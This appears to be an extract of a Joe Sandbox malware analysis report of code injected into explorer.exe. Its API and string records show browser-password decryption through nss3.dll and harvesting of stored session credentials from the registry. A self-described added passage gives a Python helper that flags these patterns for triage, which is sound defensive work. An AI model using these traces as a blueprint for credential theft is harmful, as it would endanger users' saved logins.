                                                                                                                                                      • Instruction Fuzzy Hash: 12F0A73260021C77D724CA97DC84EEBFB6DDF857A1B100169F909D3180DA629D0583A0
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _alldiv_allmul
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 727729158-0
                                                                                                                                                      • Opcode ID: ca3869a87d2c5326e468f27a24948aa618f4f3a85e134a9c224fda4dd212a83c
                                                                                                                                                      • Instruction ID: 35357c8373e0f9e3da76d06b4a9fbca9044106feb17b06e66fc80ef37dfc0eb2
                                                                                                                                                      • Opcode Fuzzy Hash: ca3869a87d2c5326e468f27a24948aa618f4f3a85e134a9c224fda4dd212a83c
                                                                                                                                                      • Instruction Fuzzy Hash: 63D1AF71A157119FC724DF24C591AAEB3E2AFD8354F048A2CF8959B291DB70ECC1CB91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c7648b35ac1e83646f9ee4abfebd0824da7b616c06102dbf16eec9d6515e8735
                                                                                                                                                      • Instruction ID: a8b63fee636d711fa909940aea4e7b7069f0b150053913d4af55adbe9592f222
                                                                                                                                                      • Opcode Fuzzy Hash: c7648b35ac1e83646f9ee4abfebd0824da7b616c06102dbf16eec9d6515e8735
                                                                                                                                                      • Instruction Fuzzy Hash: 37C1CF7391868A4FDB104A3898412A9BFA3DFB6300F1C8A6DD4E58F7C3D42DDA46C359
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                      • Opcode ID: 42cac66ebe1ff15dbe57e0d02516e2c732b3a03d5a38bc36668124b3a0d2d49c
                                                                                                                                                      • Instruction ID: 9c7ecaec02ae08c0d9927061ccf4ac87ef01019614a23fd3ed97bdc87a5a6733
                                                                                                                                                      • Opcode Fuzzy Hash: 42cac66ebe1ff15dbe57e0d02516e2c732b3a03d5a38bc36668124b3a0d2d49c
                                                                                                                                                      • Instruction Fuzzy Hash: 6D51E3726043088BC314EF24E99167AB2D6EBC8324F148B2DE8C6872D2DA35D8058642
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                        • Part of subcall function 00A01090: lstrlenW.KERNEL32(?,?,00000000,00A017E5), ref: 00A01097
                                                                                                                                                        • Part of subcall function 00A01090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 00A010A8
                                                                                                                                                        • Part of subcall function 00A019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00A02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00A019C4
                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00A02503
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00000000), ref: 00A0250A
                                                                                                                                                      • LoadLibraryW.KERNEL32(00000000), ref: 00A02563
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A02570
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00A02591
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 00A0259E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 00A025AB
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 00A025B8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 00A025C5
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 00A025D2
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 00A025DF
                                                                                                                                                        • Part of subcall function 00A0190B: lstrlen.KERNEL32(?,?,?,?,00000000,00A02783), ref: 00A0192B
                                                                                                                                                        • Part of subcall function 00A0190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00A02783), ref: 00A01930
                                                                                                                                                        • Part of subcall function 00A0190B: lstrcat.KERNEL32(00000000,?), ref: 00A01946
                                                                                                                                                        • Part of subcall function 00A0190B: lstrcat.KERNEL32(00000000,00000000), ref: 00A0194A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                                                      • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                                                      • API String ID: 3366569387-3272982511
                                                                                                                                                      • Opcode ID: b17563f457fea53dd9cd968990699284b6b70e9b7198b4b06c5ca8b3d3636626
                                                                                                                                                      • Instruction ID: 478edfe2bdc5cf82abb3a0714fdd43199051ffbda33661e9785e12cf7fdfd343
                                                                                                                                                      • Opcode Fuzzy Hash: b17563f457fea53dd9cd968990699284b6b70e9b7198b4b06c5ca8b3d3636626
                                                                                                                                                      • Instruction Fuzzy Hash: C4411831A003199BCB14EFB57D586AE7EF9EB85742B48042FE841932D1EBB68C068B51
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A05BF5: memset.NTDLL ref: 00A05C07
                                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00A060E1
                                                                                                                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 00A060EC
                                                                                                                                                      • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 00A06113
                                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00A0618E
                                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00A061B5
                                                                                                                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 00A061C1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _alldiv$_allrem$memset
                                                                                                                                                      • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                                                      • API String ID: 2557048445-1989508764
                                                                                                                                                      • Opcode ID: d1eb123b8858ebdeab6ad4fb4c62cfd1988a4cbeb2fd79e7dc1139971dda8c10
                                                                                                                                                      • Instruction ID: d1ef19ba1843100959e6117b5b3889d7a07e015f8bd2c6a039814565a96ec0be
                                                                                                                                                      • Opcode Fuzzy Hash: d1eb123b8858ebdeab6ad4fb4c62cfd1988a4cbeb2fd79e7dc1139971dda8c10
                                                                                                                                                      • Instruction Fuzzy Hash: 18B18DB1D0874AABD7259F34FD85B3B7BD4FB84308F240A59F882A61D1E630DD348A91
                                                                                                                                                      APIs
                                                                                                                                                      • memcmp.NTDLL(00A5637A,BINARY,00000007), ref: 00A1D324
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcmp
                                                                                                                                                      • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                                      • API String ID: 1475443563-3683840195
                                                                                                                                                      • Opcode ID: 6b1f3aae45206fe2a4765db579c95e6a192fb9d0e19551c337328488d1b0190a
                                                                                                                                                      • Instruction ID: 874f77fe620041725b010f5c9427fae2947071b3233bceacf381d08c11c2ed18
                                                                                                                                                      • Opcode Fuzzy Hash: 6b1f3aae45206fe2a4765db579c95e6a192fb9d0e19551c337328488d1b0190a
                                                                                                                                                      • Instruction Fuzzy Hash: F451F431908704ABC710DF64DC41AAAB7B6BF45301F144C69FDA2AB181E774FD49CBA2
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A1E
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A3C
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A75
                                                                                                                                                        • Part of subcall function 00A019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A98
                                                                                                                                                        • Part of subcall function 00A0482C: lstrlenW.KERNEL32(?), ref: 00A04845
                                                                                                                                                        • Part of subcall function 00A0482C: lstrlenW.KERNEL32(?), ref: 00A0488F
                                                                                                                                                        • Part of subcall function 00A0482C: lstrlenW.KERNEL32(?), ref: 00A04897
                                                                                                                                                      • wsprintfW.USER32 ref: 00A049A7
                                                                                                                                                      • wsprintfW.USER32 ref: 00A049B9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                                                      • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                                                      • API String ID: 2889301010-4273187114
                                                                                                                                                      • Opcode ID: 1fe45f4a9e8d42fdc65ca94144345951341d8b79483719afe9b2c6d610025109
                                                                                                                                                      • Instruction ID: 92e67fc7fa5400ae4aebd204939d12d93a50e445a650c1b4e5be4aadbdf023ff
                                                                                                                                                      • Opcode Fuzzy Hash: 1fe45f4a9e8d42fdc65ca94144345951341d8b79483719afe9b2c6d610025109
                                                                                                                                                      • Instruction Fuzzy Hash: B131F4A1B0430C6BC720AB66ED51D2BB6EDFFC97C8B05492DF545832C1DAB2DC0587A1
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.NTDLL(?,?,?,?,00000000), ref: 00A0FB32
                                                                                                                                                      • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00A0FB4D
                                                                                                                                                      • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00A0FB60
                                                                                                                                                      • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 00A0FB95
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                      • API String ID: 3510742995-3408036318
                                                                                                                                                      • Opcode ID: d434b85ada1b5fcc0aa006b142c36a97bda7063947a57b2f641d86282e55487e
                                                                                                                                                      • Instruction ID: 0f51e3c181637ec5c70e864a5e48e82db9e6018887c6a1bd90fd01dd55c2e21b
                                                                                                                                                      • Opcode Fuzzy Hash: d434b85ada1b5fcc0aa006b142c36a97bda7063947a57b2f641d86282e55487e
                                                                                                                                                      • Instruction Fuzzy Hash: AFD1E1B1A083458FDB24DF28D881B1ABBE1AF95314F08457DFC989B382EB75D805CB52
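The function records above for the code injected into explorer.exe (process 14, dump at 00A01000) contain three credential-access indicators worth pulling out of the noise: the run-time resolution of NSS exports (LoadLibraryW followed by GetProcAddress for NSS_Init, PK11_GetInternalKeySlot, PK11_Authenticate and PK11SDR_Decrypt, with nss3.dll in the string table), the registry value names HostName, UserName, Password, RemoteDirectory and PortNumber read via RegOpenKeyExW/RegQueryValueExW, and the SQLite file-handling strings -journal, -wal, immutable and nolock. The Python triage helper below is an added example, not part of the Joe Sandbox report or of the sample: it parses "APIs" and "String ID" lines in the format printed above and flags those three patterns per record. The indicator sets, the splitting of records on the "API String ID" line, and the reading of the registry value names as a WinSCP-style session layout are assumptions; the report does not show the registry key path itself.

```python
"""Triage helper for Joe Sandbox function records (added example; not part of
the report, of Joe Sandbox, or of the analysed sample).  It parses the "APIs"
and "String ID" lines of a function listing and flags credential-access
patterns seen in the explorer.exe injected code."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Indicator sets are assumptions taken from the records in the listing.
NSS_CHAIN = {"NSS_Init", "PK11_GetInternalKeySlot", "PK11_Authenticate", "PK11SDR_Decrypt"}
SESSION_VALUES = {"HostName", "UserName", "Password"}          # WinSCP-style session values (assumption)
SQLITE_MARKERS = {"-journal", "-wal", "immutable", "nolock"}   # SQLite journal/URI parameters

# Matches "Name.MODULE(args), ref: ADDR" and "Name.MODULE ref: ADDR", with or
# without the "Part of subcall function XXXX: " prefix used for callee APIs.
API_RE = re.compile(
    r"(?:Part of subcall function [0-9A-F]+: )?"
    r"([A-Za-z_][A-Za-z0-9_]*)\.([A-Z0-9]+)(?:\((.*)\))?,? ref: ([0-9A-F]+)$"
)


@dataclass
class Record:
    key: str = ""                                                   # the "API String ID" value
    apis: list[tuple[str, list[str]]] = field(default_factory=list)  # (api name, argument list)
    strings: set[str] = field(default_factory=set)                  # "$"-separated String ID field


def parse_records(text: str) -> list[Record]:
    """Collect API calls and strings; a record closes at its 'API String ID' line."""
    records: list[Record] = []
    cur = Record()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line.startswith("String ID:"):
            cur.strings = {s for s in line[len("String ID:"):].strip().split("$") if s}
        elif line.startswith("API String ID:"):
            cur.key = line[len("API String ID:"):].strip()
            records.append(cur)
            cur = Record()
        elif line.startswith("API ID:"):
            continue  # abbreviated API token list; the "APIs" lines carry the real names
        else:
            m = API_RE.match(line)
            if m:
                args = m.group(3)
                cur.apis.append((m.group(1), args.split(",") if args else []))
    return records


def gp_targets(rec: Record) -> set[str]:
    """Export names passed to GetProcAddress, i.e. imports resolved at run time."""
    return {args[1] for name, args in rec.apis if name == "GetProcAddress" and len(args) > 1}


def classify(rec: Record) -> list[str]:
    """Return the credential-access patterns a single record matches."""
    hits: list[str] = []
    resolved = gp_targets(rec)
    # Require the nss3.dll string as well, so a bare mention of PK11 names does not fire.
    if NSS_CHAIN <= (rec.strings | resolved) and "nss3.dll" in rec.strings:
        hits.append("nss3.dll PK11SDR_Decrypt chain: decrypts Firefox/Thunderbird saved logins")
    if SESSION_VALUES <= rec.strings and any(n.startswith("RegQueryValueEx") for n, _ in rec.apis):
        hits.append("registry session values HostName/UserName/Password: stored session "
                    "harvesting (WinSCP-style layout, assumption)")
    if SQLITE_MARKERS <= rec.strings:
        hits.append("embedded SQLite file-open logic (-journal/-wal/immutable/nolock)")
    return hits


def triage(text: str) -> dict[str, list[str]]:
    """Map each record's API String ID to the patterns it matches."""
    return {rec.key: classify(rec) for rec in parse_records(text)}


# Constructed input: three records copied (trimmed) from the listing above.
SAMPLE = """
• LoadLibraryW.KERNEL32(00000000), ref: 00A02563
• GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00A02591
• GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 00A025B8
• GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 00A025C5
• GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 00A025D2
• API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
• String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
• API String ID: 3366569387-3272982511
  • Part of subcall function 00A019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A1E
  • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A3C
• wsprintfW.USER32 ref: 00A049A7
• String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
• API String ID: 2889301010-4273187114
• memcpy.NTDLL(?,?,?,?,00000000), ref: 00A0FB32
• String ID: -journal$-wal$immutable$nolock
• API String ID: 3510742995-3408036318
"""

if __name__ == "__main__":
    for key, hits in triage(SAMPLE).items():
        print(key, "->", hits or ["no credential-access indicators"])
```

Run it over a saved copy of the function listing; records without a hit print a neutral line. The NSS check deliberately needs both the export names and the nss3.dll string in the same record, and the session check needs an actual RegQueryValueEx call next to the value names, so that string tables alone do not produce a finding.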
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: %$-x0$NaN
                                                                                                                                                      • API String ID: 0-62881354
                                                                                                                                                      • Opcode ID: 6b17b2720a08fe6450e12a66e0fd65ef2869b13936234de31af1ba6ac8d19489
                                                                                                                                                      • Instruction ID: 2fc5845bee582eb9e95640a4de05fbf7c52263e8ab877a03748006e1ed731fea
                                                                                                                                                      • Opcode Fuzzy Hash: 6b17b2720a08fe6450e12a66e0fd65ef2869b13936234de31af1ba6ac8d19489
                                                                                                                                                      • Instruction Fuzzy Hash: 5AD1E470E0C39A8FD7258F28A49036EBBE1AF99308F24495DF8C2872D1D670E945D792
                                                                                                                                                      Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID:
• String ID: -x0$NaN
• API String ID: 0-3447725786
• Opcode ID: ee5e512dd3fbd70a7cedbf569949a71f0fb94d255d2d5670056d516fe507674f
• Instruction ID: fd3444ec83fd2b9d71d3ced33a9425ec397228ebffa1cefb3fc8fb4d04b3cd53
• Opcode Fuzzy Hash: ee5e512dd3fbd70a7cedbf569949a71f0fb94d255d2d5670056d516fe507674f
• Instruction Fuzzy Hash: 51E1E330E0C39A8FD7258F28E49036EBBE1AF99348F24495DE8C2872D1D670ED45D792
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID:
• String ID: -x0$NaN
• API String ID: 0-3447725786
• Opcode ID: b43b00130ed8dc4f00090e399434213a0aea3b94890fbf07f986d4154bdb11de
• Instruction ID: f048ffd4bd239d95084bc11fbe7e027e0f2d3993a387f4b7554d1719619d07da
• Opcode Fuzzy Hash: b43b00130ed8dc4f00090e399434213a0aea3b94890fbf07f986d4154bdb11de
• Instruction Fuzzy Hash: 67E1D270E0C39A8BD7258F28E49076EBBE1AF9A308F14495DF8C1872D1D670ED45D792
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID:
• String ID: -x0$NaN
• API String ID: 0-3447725786
• Opcode ID: f8c2fc51d62505d70ed894b47089d443d5dbbb43bf4290ae4d495f103bb46c07
• Instruction ID: 82284475d2e7a088f1ee8ba29af66b36cecf6a6fccf067bf7f7f23970c453098
• Opcode Fuzzy Hash: f8c2fc51d62505d70ed894b47089d443d5dbbb43bf4290ae4d495f103bb46c07
• Instruction Fuzzy Hash: 03E1E170E0C39A8FD7258F28E49076EBBE1AF99308F18495DF8C1872D1D670E945D792
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID:
• String ID: -x0$NaN
• API String ID: 0-3447725786
• Opcode ID: 92a5e921161fddd606282e8c11703e2590ac9e4336501e3acc7b0aef0ae9eabf
• Instruction ID: 2bc5861101cd82ff39db6fcad506109d6c0d8df913c0a2f22584ae5f7afa5b51
• Opcode Fuzzy Hash: 92a5e921161fddd606282e8c11703e2590ac9e4336501e3acc7b0aef0ae9eabf
• Instruction Fuzzy Hash: AFE1D270E0C39A8FD7258F28E49076EBBE1AF99308F14495DF8C2872D1D670E945D792
APIs
• _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 00A0720E
• _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00A07226
• _aulldvrm.NTDLL(00000000,00000000,?), ref: 00A0727B
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: _aulldvrm$_aullrem
• String ID: -x0$NaN
• API String ID: 105165338-3447725786
• Opcode ID: 42b3483068763589b5394e3b90286025d5060a35295803741e56e9196a0f5502
• Instruction ID: a2920081e9db8d9af087152e99fd2c413a15bc1573d4f6d3dcd09eeebd664ceb
• Opcode Fuzzy Hash: 42b3483068763589b5394e3b90286025d5060a35295803741e56e9196a0f5502
• Instruction Fuzzy Hash: 18D1E470E0C39A8FD7258F28A49076EBBE1AF99308F14495DF8C1872D1D670ED45D782
APIs
• _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00A08AAD
• _allmul.NTDLL(?,?,0000000A,00000000), ref: 00A08B66
• _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00A08C9B
• _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00A08CAE
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: _allmul$_alldvrm
• String ID: .
• API String ID: 115548886-248832578
• Opcode ID: afe99f237dd827f54eab3c8a37399e0ea1541c6e93dcbc2e335149aca513c469
• Instruction ID: 5d3432eaab9d36e8d4f39e6b83e63d89e4ddc38cc2c93d3916743ed9a7f6ab89
• Opcode Fuzzy Hash: afe99f237dd827f54eab3c8a37399e0ea1541c6e93dcbc2e335149aca513c469
• Instruction Fuzzy Hash: 98D1F6B190C78D8FD710DF59A48023EBBF0BB95351F04096EF6C5962C1DBB889458B8A
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: memset
• String ID: ,$7$9
• API String ID: 2221118986-1653249994
• Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
• Instruction ID: c79207f83842d4322496dffc1a59ff547f577a3cbda45f9c4188c39591997da5
• Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
• Instruction Fuzzy Hash: C1316B715083949FD330DF64E840B8FBBE8AF85340F00892EF98997251EB75964CCBA2
APIs
• lstrlenW.KERNEL32(00000000,00000000,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01BCC
• StrStrIW.SHLWAPI(00000000,.exe,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01BF0
• StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01C05
• lstrlenW.KERNEL32(00000000,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01C1C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: lstrlen
• String ID: .exe
• API String ID: 1659193697-4119554291
• Opcode ID: 6750fdfe820b908f78960d0177d76c9edd178e6b3e2dac5c056c4d9ad10a9e5f
• Instruction ID: e32c277743d2be0b9b0ba41c0532173a9c98ed5a7137c314cd279534e72a4ab1
• Opcode Fuzzy Hash: 6750fdfe820b908f78960d0177d76c9edd178e6b3e2dac5c056c4d9ad10a9e5f
• Instruction Fuzzy Hash: D8F0CD303507249AE324AF74BC45BFB62A4FF02342B20492AE046C71E1FBA0CC42C799
APIs
• _allmul.NTDLL(?,00000000,00000018), ref: 00A1316F
• _allmul.NTDLL(-00000001,00000000,?,?), ref: 00A131D2
• _alldiv.NTDLL(?,?,00000000), ref: 00A132DE
• _allmul.NTDLL(00000000,?,00000000), ref: 00A132E7
• _allmul.NTDLL(?,00000000,?,?), ref: 00A13392
  • Part of subcall function 00A116CD: memset.NTDLL ref: 00A1172B
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: _allmul$_alldivmemset
• String ID:
• API String ID: 3880648599-0
• Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
• Instruction ID: 6f594ccb0c7faebf10c6a34d5dd84578f66f5e52a8cbd33725d081c29d73cf2d
• Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
• Instruction Fuzzy Hash: 5FD1A8726083019FCF24DF69C580BAEBBE1AF88704F14492DF9A587251DB70DE85CB82
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID:
• String ID: FOREIGN KEY constraint failed$new$old
• API String ID: 0-384346570
• Opcode ID: ff0bdea17b9dc38d7c1aa2800127247f3906fd7e8f9850b1cbea34660376ee2e
• Instruction ID: 45057ee5b478f98a637396fa76050c3ad5075317a585549c69a68afb050d0d23
• Opcode Fuzzy Hash: ff0bdea17b9dc38d7c1aa2800127247f3906fd7e8f9850b1cbea34660376ee2e
• Instruction Fuzzy Hash: 79D13A707083109FD714DF28D981B2FBBEAABD8750F10892EF9458B291DB78D945CB92
APIs
• _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 00A096E7
• _alldiv.NTDLL(00000000,80000000,?,?), ref: 00A09707
• _alldiv.NTDLL(00000000,80000000,?,?), ref: 00A09739
• _alldiv.NTDLL(00000001,80000000,?,?), ref: 00A0976C
• _allmul.NTDLL(?,?,?,?), ref: 00A09798
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
